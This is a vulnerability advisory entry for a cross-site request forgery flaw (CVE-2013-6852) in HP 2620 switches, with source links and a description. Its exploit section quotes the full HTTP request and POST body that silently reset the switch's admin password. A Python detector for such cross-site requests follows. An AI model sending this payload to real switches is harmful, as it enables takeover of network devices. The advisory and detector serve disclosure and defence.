HP 2620 Switch Cross-Site Request Forgery Vulnerability

Vulnerability ID: 1121881, Vulnerability type: Cross-site request forgery
Published: 2013-09-26, Updated: 2013-11-25
CVE ID: CVE-2013-6852, CNNVD-ID: CNNVD-201311-339
Platform: Hardware, CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/28562
https://www.securityfocus.com/bid/63690
https://cxsecurity.com/issue/WLB-2013110161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201311-339
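|Vulnerability details
HP 2620 Switches are the 2620 series switches from Hewlett-Packard (HP) of the United States. The series supports IPv4/IPv6 static routing and RIP routing. The html/json.html page on the HP 2620 switch contains a cross-site request forgery vulnerability. A remote attacker can exploit it through the 'setPassword' method to change the administrator password.
|Exploit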
# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert Grądek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP //  RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache





POST Content:


method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager
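A detection-side check for the request pattern shown above, as an added example that is not part of the advisory or of HP's firmware: it classifies captured requests to html/json.html that call setPassword by whether their Origin/Referer matches the Host header. It assumes requests are available as raw HTTP text from a proxy or sensor in front of the management interface; the address 192.0.2.10, the host example.net and all function names are constructed for illustration.

```python
from urllib.parse import urlsplit

TARGET_PATH = "/html/json.html"  # endpoint named in the advisory


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), urlsplit(target).path, headers, body.strip()


def is_set_password(body):
    # The advisory's body starts "method:setPassword&..."; accept "=" as well.
    first = body.split("&", 1)[0].replace(":", "=", 1)
    return first.lower() == "method=setpassword"


def classify(raw):
    """Return 'ignore', 'same-origin' or 'cross-site' for one request."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH or not is_set_password(body):
        return "ignore"
    source = headers.get("origin") or headers.get("referer") or ""
    source_host = urlsplit(source).netloc.lower()
    host = headers.get("host", "").lower()
    # A missing or unparsable Origin/Referer is treated as cross-site (fail closed).
    return "same-origin" if source_host and source_host == host else "cross-site"


# Constructed sample requests; 192.0.2.10 stands in for the switch address.
SAME_ORIGIN = ("POST /html/json.html HTTP/1.1\r\n"
               "Host: 192.0.2.10\r\n"
               "Referer: http://192.0.2.10/html/nhome.html\r\n"
               "Cookie: sessionId=ANYTHING\r\n"
               "\r\n"
               "method:setPassword&name=admin&password=x&access=Manager")
CROSS_SITE = SAME_ORIGIN.replace("http://192.0.2.10/html/nhome.html",
                                 "http://example.net/page.html")

if __name__ == "__main__":
    for label, req in (("same-origin sample", SAME_ORIGIN), ("cross-site sample", CROSS_SITE)):
        print(label, "->", classify(req))
```
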
|References

Source: EXPLOIT-DB
Name: 28562
Link: http://www.exploit-db.com/exploits/28562/